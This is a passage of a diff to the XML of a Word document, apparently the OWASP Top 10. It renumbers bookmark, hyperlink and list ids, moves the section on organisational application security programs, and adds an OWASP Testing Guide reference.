-      <w:hyperlink r:id="rId145">
+      <w:hyperlink r:id="rId143">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -7438,7 +7587,7 @@
       <w:r>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
-      <w:hyperlink r:id="rId145">
+      <w:hyperlink r:id="rId143">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -7454,8 +7603,8 @@
       <w:pPr>
         <w:pStyle w:val="Heading1"/>
       </w:pPr>
-      <w:bookmarkStart w:id="146" w:name="t-whats-next-for-security-testing-1"/>
-      <w:bookmarkEnd w:id="146"/>
+      <w:bookmarkStart w:id="144" w:name="t-whats-next-for-security-testing-1"/>
+      <w:bookmarkEnd w:id="144"/>
       <w:r>
         <w:t xml:space="preserve">+T What's Next for Security Testing</w:t>
       </w:r>
@@ -7464,8 +7613,8 @@
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
-      <w:bookmarkStart w:id="147" w:name="establish-continuous-application-security-testing"/>
-      <w:bookmarkEnd w:id="147"/>
+      <w:bookmarkStart w:id="145" w:name="establish-continuous-application-security-testing"/>
+      <w:bookmarkEnd w:id="145"/>
       <w:r>
         <w:t xml:space="preserve">Establish Continuous Application Security Testing</w:t>
       </w:r>
@@ -7657,186 +7806,186 @@
       <w:pPr>
         <w:pStyle w:val="Heading1"/>
       </w:pPr>
-      <w:bookmarkStart w:id="148" w:name="o-whats-next-for-organizations"/>
+      <w:bookmarkStart w:id="146" w:name="o-whats-next-for-organizations"/>
+      <w:bookmarkEnd w:id="146"/>
+      <w:r>
+        <w:t xml:space="preserve">+O What's Next for Organizations</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+      </w:pPr>
+      <w:bookmarkStart w:id="147" w:name="start-your-application-security-program-now"/>
+      <w:bookmarkEnd w:id="147"/>
+      <w:r>
+        <w:t xml:space="preserve">Start Your Application Security Program Now</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="FirstParagraph"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Application security is no longer optional. Between increasing attacks and regulatory pressures, organizations must establish an effective capability for securing their applications and APIs. Given the staggering amount of code in the numerous applications and APIs already in production, many organizations are struggling to get a handle on the enormous volume of vulnerabilities. OWASP recommends that organizations establish an application security program to gain insight and improve security across their application portfolio. Achieving application security requires many different parts of an organization to work together efficiently, including security and audit, software development, and business and executive management. It requires security to be visible, so that all the different players can see and understand the organization’s application security posture. It also requires focus on the activities and outcomes that actually help improve enterprise security by reducing risk in the most cost effective manner. Some of the key activities in effective application security programs include:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="BodyText"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">| Activity | Description |</w:t>
+      </w:r>
+      <w:r>
+        <w:br w:type="textWrapping"/>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">| --- | --- |</w:t>
+      </w:r>
+      <w:r>
+        <w:br w:type="textWrapping"/>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">| Get Started | * Establish an application security program and drive adoption.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Compact"/>
+        <w:numPr>
+          <w:numId w:val="1040"/>
+          <w:ilvl w:val="0"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Conduct a capability gap analysis comparing your organization to your peers to define key improvement areas and an execution plan.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Compact"/>
+        <w:numPr>
+          <w:numId w:val="1040"/>
+          <w:ilvl w:val="0"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Gain management approval and establish an application security awareness campaign for the entire IT organization.|</w:t>
+      </w:r>
+      <w:r>
+        <w:br w:type="textWrapping"/>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">| Risk Based Portfolio Approach | * Identify and prioritize your application portfolio from an inherent risk perspective.</w:t>
+      </w:r>
+      <w:r>
+        <w:br w:type="textWrapping"/>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">*Create an application risk profiling model to measure and prioritize all your applications and APIs.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Compact"/>
+        <w:numPr>
+          <w:numId w:val="1040"/>
+          <w:ilvl w:val="0"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Establish assurance guidelines to properly define coverage and level of rigor required.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Compact"/>
+        <w:numPr>
+          <w:numId w:val="1040"/>
+          <w:ilvl w:val="0"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Establish a common risk rating model with a consistent set of likelihood and impact factors reflective of your organization's tolerance for risk. |</w:t>
+      </w:r>
+      <w:r>
+        <w:br w:type="textWrapping"/>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">| Enable with a Strong Foundation | * Establish a set of focused policies and standards that provide an application security baseline for all development teams to adhere to.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Compact"/>
+        <w:numPr>
+          <w:numId w:val="1040"/>
+          <w:ilvl w:val="0"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Define a common set of reusable security controls that complement these policies and standards and provide design and development guidance on their use.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Compact"/>
+        <w:numPr>
+          <w:numId w:val="1040"/>
+          <w:ilvl w:val="0"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Establish an application security training curriculum that is required and targeted to different development roles and topics. |</w:t>
+      </w:r>
+      <w:r>
+        <w:br w:type="textWrapping"/>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">| Integrate Security into Existing Processes | Define and integrate secure implementation and verification activities into existing development and operational processes. Activities include Threat Modeling, Secure Design &amp; Review, Secure Coding &amp; Code Review, Penetration Testing, and Remediation.</w:t>
+      </w:r>
+      <w:r>
+        <w:br w:type="textWrapping"/>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">Provide subject matter experts and support services for development and project teams to be successful. |</w:t>
+      </w:r>
+      <w:r>
+        <w:br w:type="textWrapping"/>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">| Provide Management Visibility | * Manage with metrics. Drive improvement and funding decisions based on the metrics and analysis data captured. Metrics include adherence to security practices / activities, vulnerabilities introduced, vulnerabilities mitigated, application coverage, defect density by type and instance counts, etc.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Compact"/>
+        <w:numPr>
+          <w:numId w:val="1040"/>
+          <w:ilvl w:val="0"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Analyze data from the implementation and verification activities to look for root cause and vulnerability patterns to drive strategic and systemic improvements across the enterprise. |</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading1"/>
+      </w:pPr>
+      <w:bookmarkStart w:id="148" w:name="r-about-risks"/>
       <w:bookmarkEnd w:id="148"/>
       <w:r>
-        <w:t xml:space="preserve">+O What's Next for Organizations</w:t>
+        <w:t xml:space="preserve">+R About Risks</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
-      <w:bookmarkStart w:id="149" w:name="start-your-application-security-program-now"/>
+      <w:bookmarkStart w:id="149" w:name="defining-our-terms"/>
       <w:bookmarkEnd w:id="149"/>
-      <w:r>
-        <w:t xml:space="preserve">Start Your Application Security Program Now</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="FirstParagraph"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">Application security is no longer optional. Between increasing attacks and regulatory pressures, organizations must establish an effective capability for securing their applications and APIs. Given the staggering amount of code in the numerous applications and APIs already in production, many organizations are struggling to get a handle on the enormous volume of vulnerabilities. OWASP recommends that organizations establish an application security program to gain insight and improve security across their application portfolio. Achieving application security requires many different parts of an organization to work together efficiently, including security and audit, software development, and business and executive management. It requires security to be visible, so that all the different players can see and understand the organization’s application security posture. It also requires focus on the activities and outcomes that actually help improve enterprise security by reducing risk in the most cost effective manner. Some of the key activities in effective application security programs include:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="BodyText"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">| Activity | Description |</w:t>
-      </w:r>
-      <w:r>
-        <w:br w:type="textWrapping"/>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">| --- | --- |</w:t>
-      </w:r>
-      <w:r>
-        <w:br w:type="textWrapping"/>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">| Get Started | * Establish an application security program and drive adoption.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Compact"/>
-        <w:numPr>
-          <w:numId w:val="1036"/>
-          <w:ilvl w:val="0"/>
-        </w:numPr>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">Conduct a capability gap analysis comparing your organization to your peers to define key improvement areas and an execution plan.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Compact"/>
-        <w:numPr>
-          <w:numId w:val="1036"/>
-          <w:ilvl w:val="0"/>
-        </w:numPr>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">Gain management approval and establish an application security awareness campaign for the entire IT organization.|</w:t>
-      </w:r>
-      <w:r>
-        <w:br w:type="textWrapping"/>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">| Risk Based Portfolio Approach | * Identify and prioritize your application portfolio from an inherent risk perspective.</w:t>
-      </w:r>
-      <w:r>
-        <w:br w:type="textWrapping"/>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">*Create an application risk profiling model to measure and prioritize all your applications and APIs.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Compact"/>
-        <w:numPr>
-          <w:numId w:val="1036"/>
-          <w:ilvl w:val="0"/>
-        </w:numPr>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">Establish assurance guidelines to properly define coverage and level of rigor required.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Compact"/>
-        <w:numPr>
-          <w:numId w:val="1036"/>
-          <w:ilvl w:val="0"/>
-        </w:numPr>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">Establish a common risk rating model with a consistent set of likelihood and impact factors reflective of your organization's tolerance for risk. |</w:t>
-      </w:r>
-      <w:r>
-        <w:br w:type="textWrapping"/>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">| Enable with a Strong Foundation | * Establish a set of focused policies and standards that provide an application security baseline for all development teams to adhere to.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Compact"/>
-        <w:numPr>
-          <w:numId w:val="1036"/>
-          <w:ilvl w:val="0"/>
-        </w:numPr>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">Define a common set of reusable security controls that complement these policies and standards and provide design and development guidance on their use.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Compact"/>
-        <w:numPr>
-          <w:numId w:val="1036"/>
-          <w:ilvl w:val="0"/>
-        </w:numPr>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">Establish an application security training curriculum that is required and targeted to different development roles and topics. |</w:t>
-      </w:r>
-      <w:r>
-        <w:br w:type="textWrapping"/>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">| Integrate Security into Existing Processes | Define and integrate secure implementation and verification activities into existing development and operational processes. Activities include Threat Modeling, Secure Design &amp; Review, Secure Coding &amp; Code Review, Penetration Testing, and Remediation.</w:t>
-      </w:r>
-      <w:r>
-        <w:br w:type="textWrapping"/>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">Provide subject matter experts and support services for development and project teams to be successful. |</w:t>
-      </w:r>
-      <w:r>
-        <w:br w:type="textWrapping"/>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">| Provide Management Visibility | * Manage with metrics. Drive improvement and funding decisions based on the metrics and analysis data captured. Metrics include adherence to security practices / activities, vulnerabilities introduced, vulnerabilities mitigated, application coverage, defect density by type and instance counts, etc.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Compact"/>
-        <w:numPr>
-          <w:numId w:val="1036"/>
-          <w:ilvl w:val="0"/>
-        </w:numPr>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">Analyze data from the implementation and verification activities to look for root cause and vulnerability patterns to drive strategic and systemic improvements across the enterprise. |</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading1"/>
-      </w:pPr>
-      <w:bookmarkStart w:id="150" w:name="r-about-risks"/>
-      <w:bookmarkEnd w:id="150"/>
-      <w:r>
-        <w:t xml:space="preserve">+R About Risks</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading2"/>
-      </w:pPr>
-      <w:bookmarkStart w:id="151" w:name="defining-our-terms"/>
-      <w:bookmarkEnd w:id="151"/>
       <w:r>
         <w:t xml:space="preserve">Defining our terms</w:t>
       </w:r>
@@ -8099,7 +8248,7 @@
     <w:p>
       <w:pPr>
         <w:numPr>
-          <w:numId w:val="1037"/>
+          <w:numId w:val="1041"/>
           <w:ilvl w:val="0"/>
         </w:numPr>
       </w:pPr>
@@ -8110,7 +8259,7 @@
     <w:p>
       <w:pPr>
         <w:numPr>
-          <w:numId w:val="1037"/>
+          <w:numId w:val="1041"/>
           <w:ilvl w:val="0"/>
         </w:numPr>
       </w:pPr>
@@ -8154,8 +8303,8 @@
       <w:pPr>
         <w:pStyle w:val="Heading1"/>
       </w:pPr>
-      <w:bookmarkStart w:id="152" w:name="f-details-about-risk-factors"/>
-      <w:bookmarkEnd w:id="152"/>
+      <w:bookmarkStart w:id="150" w:name="f-details-about-risk-factors"/>
+      <w:bookmarkEnd w:id="150"/>
       <w:r>
         <w:t xml:space="preserve">+F Details about Risk factors</w:t>
       </w:r>
@@ -8164,8 +8313,8 @@
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
-      <w:bookmarkStart w:id="153" w:name="top-10-risk-factor-summary"/>
-      <w:bookmarkEnd w:id="153"/>
+      <w:bookmarkStart w:id="151" w:name="top-10-risk-factor-summary"/>
+      <w:bookmarkEnd w:id="151"/>
       <w:r>
         <w:t xml:space="preserve">Top 10 Risk Factor Summary</w:t>
       </w:r>
@@ -9104,8 +9253,8 @@
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
-      <w:bookmarkStart w:id="154" w:name="additional-risks-to-consider"/>
-      <w:bookmarkEnd w:id="154"/>
+      <w:bookmarkStart w:id="152" w:name="additional-risks-to-consider"/>
+      <w:bookmarkEnd w:id="152"/>
       <w:r>
         <w:t xml:space="preserve">Additional Risks To Consider</w:t>
       </w:r>
@@ -9122,7 +9271,7 @@
       <w:pPr>
         <w:pStyle w:val="Compact"/>
         <w:numPr>
-          <w:numId w:val="1038"/>
+          <w:numId w:val="1042"/>
           <w:ilvl w:val="0"/>
         </w:numPr>
       </w:pPr>
@@ -9134,7 +9283,7 @@
       <w:pPr>
         <w:pStyle w:val="Compact"/>
         <w:numPr>
-          <w:numId w:val="1038"/>
+          <w:numId w:val="1042"/>
           <w:ilvl w:val="0"/>
         </w:numPr>
       </w:pPr>
@@ -9170,7 +9319,7 @@
       <w:pPr>
         <w:pStyle w:val="Compact"/>
         <w:numPr>
-          <w:numId w:val="1039"/>
+          <w:numId w:val="1043"/>
           <w:ilvl w:val="0"/>
         </w:numPr>
       </w:pPr>
@@ -9190,8 +9339,8 @@
       <w:pPr>
         <w:pStyle w:val="Heading1"/>
       </w:pPr>
-      <w:bookmarkStart w:id="155" w:name="appendix-a-glossary"/>
-      <w:bookmarkEnd w:id="155"/>
+      <w:bookmarkStart w:id="153" w:name="appendix-a-glossary"/>
+      <w:bookmarkEnd w:id="153"/>
       <w:r>
         <w:t xml:space="preserve">Appendix A: Glossary</w:t>
       </w:r>
@@ -9200,7 +9349,7 @@
       <w:pPr>
         <w:pStyle w:val="Compact"/>
         <w:numPr>
-          <w:numId w:val="1040"/>
+          <w:numId w:val="1044"/>
           <w:ilvl w:val="0"/>
         </w:numPr>
       </w:pPr>
@@ -9221,7 +9370,7 @@
       <w:pPr>
         <w:pStyle w:val="Compact"/>
         <w:numPr>
-          <w:numId w:val="1040"/>
+          <w:numId w:val="1044"/>
           <w:ilvl w:val="0"/>
         </w:numPr>
       </w:pPr>
@@ -9242,7 +9391,7 @@
       <w:pPr>
         <w:pStyle w:val="Compact"/>
         <w:numPr>
-          <w:numId w:val="1040"/>
+          <w:numId w:val="1044"/>
           <w:ilvl w:val="0"/>
         </w:numPr>
       </w:pPr>
@@ -9263,7 +9412,7 @@
       <w:pPr>
         <w:pStyle w:val="Compact"/>
         <w:numPr>
-          <w:numId w:val="1040"/>
+          <w:numId w:val="1044"/>
           <w:ilvl w:val="0"/>
         </w:numPr>
       </w:pPr>
@@ -9284,7 +9433,7 @@
       <w:pPr>
         <w:pStyle w:val="Compact"/>
         <w:numPr>
-          <w:numId w:val="1040"/>
+          <w:numId w:val="1044"/>
           <w:ilvl w:val="0"/>
         </w:numPr>
       </w:pPr>
@@ -9305,7 +9454,7 @@
       <w:pPr>
         <w:pStyle w:val="Compact"/>
         <w:numPr>
-          <w:numId w:val="1040"/>
+          <w:numId w:val="1044"/>
           <w:ilvl w:val="0"/>
         </w:numPr>
       </w:pPr>
@@ -9326,7 +9475,7 @@
       <w:pPr>
         <w:pStyle w:val="Compact"/>
         <w:numPr>
-          <w:numId w:val="1040"/>
+          <w:numId w:val="1044"/>
           <w:ilvl w:val="0"/>
         </w:numPr>
       </w:pPr>
@@ -9347,7 +9496,7 @@
       <w:pPr>
         <w:pStyle w:val="Compact"/>
         <w:numPr>
-          <w:numId w:val="1040"/>
+          <w:numId w:val="1044"/>
           <w:ilvl w:val="0"/>
         </w:numPr>
       </w:pPr>
@@ -9368,7 +9517,7 @@
       <w:pPr>
         <w:pStyle w:val="Compact"/>
         <w:numPr>
-          <w:numId w:val="1040"/>
+          <w:numId w:val="1044"/>
           <w:ilvl w:val="0"/>
         </w:numPr>
       </w:pPr>
@@ -9389,7 +9538,7 @@
       <w:pPr>
         <w:pStyle w:val="Compact"/>
         <w:numPr>
-          <w:numId w:val="1040"/>
+          <w:numId w:val="1044"/>
           <w:ilvl w:val="0"/>
         </w:numPr>
       </w:pPr>
@@ -9410,7 +9559,7 @@
       <w:pPr>
         <w:pStyle w:val="Compact"/>
         <w:numPr>
-          <w:numId w:val="1040"/>
+          <w:numId w:val="1044"/>
           <w:ilvl w:val="0"/>
         </w:numPr>
       </w:pPr>
@@ -9431,7 +9580,7 @@
       <w:pPr>
         <w:pStyle w:val="Compact"/>
         <w:numPr>
-          <w:numId w:val="1040"/>
+          <w:numId w:val="1044"/>
           <w:ilvl w:val="0"/>
         </w:numPr>
       </w:pPr>
@@ -9452,7 +9601,7 @@
       <w:pPr>
         <w:pStyle w:val="Compact"/>
         <w:numPr>
-          <w:numId w:val="1040"/>
+          <w:numId w:val="1044"/>
           <w:ilvl w:val="0"/>
         </w:numPr>
       </w:pPr>
@@ -9473,7 +9622,7 @@
       <w:pPr>
         <w:pStyle w:val="Compact"/>
         <w:numPr>
-          <w:numId w:val="1040"/>
+          <w:numId w:val="1044"/>
           <w:ilvl w:val="0"/>
         </w:numPr>
       </w:pPr>
@@ -9494,7 +9643,7 @@
       <w:pPr>
         <w:pStyle w:val="Compact"/>
         <w:numPr>
-          <w:numId w:val="1040"/>
+          <w:numId w:val="1044"/>
           <w:ilvl w:val="0"/>
         </w:numPr>
       </w:pPr>
@@ -9515,7 +9664,7 @@
       <w:pPr>
         <w:pStyle w:val="Compact"/>
         <w:numPr>
-          <w:numId w:val="1040"/>
+          <w:numId w:val="1044"/>
           <w:ilvl w:val="0"/>
         </w:numPr>
       </w:pPr>
@@ -9536,7 +9685,7 @@
       <w:pPr>
         <w:pStyle w:val="Compact"/>
         <w:numPr>
-          <w:numId w:val="1040"/>
+          <w:numId w:val="1044"/>
           <w:ilvl w:val="0"/>
         </w:numPr>
       </w:pPr>
@@ -9557,7 +9706,7 @@
       <w:pPr>
         <w:pStyle w:val="Compact"/>
         <w:numPr>
-          <w:numId w:val="1040"/>
+          <w:numId w:val="1044"/>
           <w:ilvl w:val="0"/>
         </w:numPr>
       </w:pPr>
@@ -9578,7 +9727,7 @@
       <w:pPr>
         <w:pStyle w:val="Compact"/>
         <w:numPr>
-          <w:numId w:val="1040"/>
+          <w:numId w:val="1044"/>
           <w:ilvl w:val="0"/>
         </w:numPr>
       </w:pPr>
@@ -9599,7 +9748,7 @@
       <w:pPr>
         <w:pStyle w:val="Compact"/>
         <w:numPr>
-          <w:numId w:val="1040"/>
+          <w:numId w:val="1044"/>
           <w:ilvl w:val="0"/>
         </w:numPr>
       </w:pPr>
@@ -9620,7 +9769,7 @@
       <w:pPr>
         <w:pStyle w:val="Compact"/>
         <w:numPr>
-          <w:numId w:val="1040"/>
+          <w:numId w:val="1044"/>
           <w:ilvl w:val="0"/>
         </w:numPr>
       </w:pPr>
@@ -9641,7 +9790,7 @@
       <w:pPr>
         <w:pStyle w:val="Compact"/>
         <w:numPr>
-          <w:numId w:val="1040"/>
+          <w:numId w:val="1044"/>
           <w:ilvl w:val="0"/>
         </w:numPr>
       </w:pPr>
@@ -9662,7 +9811,7 @@
       <w:pPr>
         <w:pStyle w:val="Compact"/>
         <w:numPr>
-          <w:numId w:val="1040"/>
+          <w:numId w:val="1044"/>
           <w:ilvl w:val="0"/>
         </w:numPr>
       </w:pPr>
@@ -9681,7 +9830,7 @@
       <w:r>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
-      <w:hyperlink r:id="rId156">
+      <w:hyperlink r:id="rId154">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -9694,7 +9843,7 @@
       <w:pPr>
         <w:pStyle w:val="Compact"/>
         <w:numPr>
-          <w:numId w:val="1040"/>
+          <w:numId w:val="1044"/>
           <w:ilvl w:val="0"/>
         </w:numPr>
       </w:pPr>
@@ -9715,7 +9864,7 @@
       <w:pPr>
         <w:pStyle w:val="Compact"/>
         <w:numPr>
-          <w:numId w:val="1040"/>
+          <w:numId w:val="1044"/>
           <w:ilvl w:val="0"/>
         </w:numPr>
       </w:pPr>
@@ -9736,7 +9885,7 @@
       <w:pPr>
         <w:pStyle w:val="Compact"/>
         <w:numPr>
-          <w:numId w:val="1040"/>
+          <w:numId w:val="1044"/>
           <w:ilvl w:val="0"/>
         </w:numPr>
       </w:pPr>
@@ -9757,7 +9906,7 @@
       <w:pPr>
         <w:pStyle w:val="Compact"/>
         <w:numPr>
-          <w:numId w:val="1040"/>
+          <w:numId w:val="1044"/>
           <w:ilvl w:val="0"/>
         </w:numPr>
       </w:pPr>
@@ -9778,7 +9927,7 @@
       <w:pPr>
         <w:pStyle w:val="Compact"/>
         <w:numPr>
-          <w:numId w:val="1040"/>
+          <w:numId w:val="1044"/>
           <w:ilvl w:val="0"/>
         </w:numPr>
       </w:pPr>
@@ -9799,7 +9948,7 @@
       <w:pPr>
         <w:pStyle w:val="Compact"/>
         <w:numPr>
-          <w:numId w:val="1040"/>
+          <w:numId w:val="1044"/>
           <w:ilvl w:val="0"/>
         </w:numPr>
       </w:pPr>
@@ -9820,7 +9969,7 @@
       <w:pPr>
         <w:pStyle w:val="Compact"/>
         <w:numPr>
-          <w:numId w:val="1040"/>
+          <w:numId w:val="1044"/>
           <w:ilvl w:val="0"/>
         </w:numPr>
       </w:pPr>
@@ -9841,7 +9990,7 @@
       <w:pPr>
         <w:pStyle w:val="Compact"/>
         <w:numPr>
-          <w:numId w:val="1040"/>
+          <w:numId w:val="1044"/>
           <w:ilvl w:val="0"/>
         </w:numPr>
       </w:pPr>
@@ -9862,7 +10011,7 @@
       <w:pPr>
         <w:pStyle w:val="Compact"/>
         <w:numPr>
-          <w:numId w:val="1040"/>
+          <w:numId w:val="1044"/>
           <w:ilvl w:val="0"/>
         </w:numPr>
       </w:pPr>
@@ -9883,7 +10032,7 @@
       <w:pPr>
         <w:pStyle w:val="Compact"/>
         <w:numPr>
-          <w:numId w:val="1040"/>
+          <w:numId w:val="1044"/>
           <w:ilvl w:val="0"/>
         </w:numPr>
       </w:pPr>
@@ -9904,7 +10053,7 @@
       <w:pPr>
         <w:pStyle w:val="Compact"/>
         <w:numPr>
-          <w:numId w:val="1040"/>
+          <w:numId w:val="1044"/>
           <w:ilvl w:val="0"/>
         </w:numPr>
       </w:pPr>
@@ -9925,7 +10074,7 @@
       <w:pPr>
         <w:pStyle w:val="Compact"/>
         <w:numPr>
-          <w:numId w:val="1040"/>
+          <w:numId w:val="1044"/>
           <w:ilvl w:val="0"/>
         </w:numPr>
       </w:pPr>
@@ -9946,7 +10095,7 @@
       <w:pPr>
         <w:pStyle w:val="Compact"/>
         <w:numPr>
-          <w:numId w:val="1040"/>
+          <w:numId w:val="1044"/>
           <w:ilvl w:val="0"/>
         </w:numPr>
       </w:pPr>
@@ -9967,7 +10116,7 @@
       <w:pPr>
         <w:pStyle w:val="Compact"/>
         <w:numPr>
-          <w:numId w:val="1040"/>
+          <w:numId w:val="1044"/>
           <w:ilvl w:val="0"/>
         </w:numPr>
       </w:pPr>
@@ -9985,7 +10134,7 @@
       <w:pPr>
         <w:pStyle w:val="Compact"/>
         <w:numPr>
-          <w:numId w:val="1040"/>
+          <w:numId w:val="1044"/>
           <w:ilvl w:val="0"/>
         </w:numPr>
       </w:pPr>
@@ -10006,7 +10155,7 @@
       <w:pPr>
         <w:pStyle w:val="Compact"/>
         <w:numPr>
-          <w:numId w:val="1040"/>
+          <w:numId w:val="1044"/>
           <w:ilvl w:val="0"/>
         </w:numPr>
       </w:pPr>
@@ -10027,7 +10176,7 @@
       <w:pPr>
         <w:pStyle w:val="Compact"/>
         <w:numPr>
-          <w:numId w:val="1040"/>
+          <w:numId w:val="1044"/>
           <w:ilvl w:val="0"/>
         </w:numPr>
       </w:pPr>
@@ -10056,8 +10205,8 @@
       <w:pPr>
         <w:pStyle w:val="Heading1"/>
       </w:pPr>
-      <w:bookmarkStart w:id="157" w:name="appendix-b-references"/>
-      <w:bookmarkEnd w:id="157"/>
+      <w:bookmarkStart w:id="155" w:name="appendix-b-references"/>
+      <w:bookmarkEnd w:id="155"/>
       <w:r>
         <w:t xml:space="preserve">Appendix B: References</w:t>
       </w:r>
@@ -10073,14 +10222,14 @@
     <w:p>
       <w:pPr>
         <w:numPr>
-          <w:numId w:val="1041"/>
+          <w:numId w:val="1045"/>
           <w:ilvl w:val="0"/>
         </w:numPr>
       </w:pPr>
       <w:r>
         <w:t xml:space="preserve">OWASP Proactive Controls -</w:t>
       </w:r>
-      <w:hyperlink r:id="rId158">
+      <w:hyperlink r:id="rId156">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -10092,14 +10241,14 @@
     <w:p>
       <w:pPr>
         <w:numPr>
-          <w:numId w:val="1041"/>
+          <w:numId w:val="1045"/>
           <w:ilvl w:val="0"/>
         </w:numPr>
       </w:pPr>
       <w:r>
         <w:t xml:space="preserve">OWASP Application Security Verification Standard -</w:t>
       </w:r>
-      <w:hyperlink r:id="rId159">
+      <w:hyperlink r:id="rId157">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -10111,14 +10260,29 @@
     <w:p>
       <w:pPr>
         <w:numPr>
-          <w:numId w:val="1041"/>
+          <w:numId w:val="1045"/>
+          <w:ilvl w:val="0"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">OWASP Testing Guide -</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:hyperlink r:id="rId38"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:numId w:val="1045"/>
           <w:ilvl w:val="0"/>
         </w:numPr>
       </w:pPr>
       <w:r>
         <w:t xml:space="preserve">OWASP Privacy Top 10 Risks -</w:t>
       </w:r>
-      <w:hyperlink r:id="rId160">
+      <w:hyperlink r:id="rId158">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -10130,14 +10294,14 @@
     <w:p>
       <w:pPr>
         <w:numPr>
-          <w:numId w:val="1041"/>
+          <w:numId w:val="1045"/>
           <w:ilvl w:val="0"/>
         </w:numPr>
       </w:pPr>
       <w:r>
         <w:t xml:space="preserve">OWASP Mobile Top 10 Risks -</w:t>
       </w:r>
-      <w:hyperlink r:id="rId161">
+      <w:hyperlink r:id="rId159">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
